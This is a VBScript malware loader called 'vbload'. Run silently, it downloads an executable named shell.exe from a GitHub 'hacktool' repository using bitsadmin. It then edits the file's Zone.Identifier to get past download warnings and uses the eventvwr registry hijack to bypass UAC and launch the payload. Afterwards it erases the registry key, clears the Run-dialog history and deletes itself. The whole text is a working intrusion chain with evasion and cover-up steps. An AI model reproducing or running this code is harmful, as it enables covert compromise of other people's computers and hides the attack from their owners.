vbload

1. Sub Main()
2.  
3. 'Download File
4.  
5. CreateObject("WScript.Shell").run("cmd /c bitsadmin /transfer SoftUpdate /download /priority FOREGROUND https://raw.githubusercontent.com/ulhazazi/hacktool/master/rs.exe %temp%/shell.exe"),0,true
6.  
7. 'Set new zoneId
8.  
9. CreateObject("WScript.Shell").run("cmd.exe /C echo [zoneTransfer]ZoneID = 2 > " + CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\shell.exe:ZONE.identifier"),0,true
10.  
11. 'Write UAC bypass regkey
12.  
13. CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) +"\shell.exe" ,"REG_SZ"
14.  
15. 'Trigger UAC bypass
16.  
17. CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true
18.  
19. 'Reset regkey
20.  
21. GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\",""
22.  
23. 'Clear the run-dialog history
24.  
25. CreateObject("WScript.Shell").Run("cmd.exe /C reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f "),0,true
26.  
27. 'Remove this script
28.  
29. CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False
30.  
31. End Sub
32.  
33. 'Dont wanna display shit
34.  
35. On Error Resume Next
36.  
37.  
38.  
39. Main
40.  
41.  
42.  
43.  
44.  
45. If Err.Number Then
46.  
47.  
48.  
49. 'on error cleanup and exit
50.  
51.  
52.  
53. CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False
54.  
55.  
56.  
57. WScript.Quit 4711
58.  
59.  
60.  
61. End If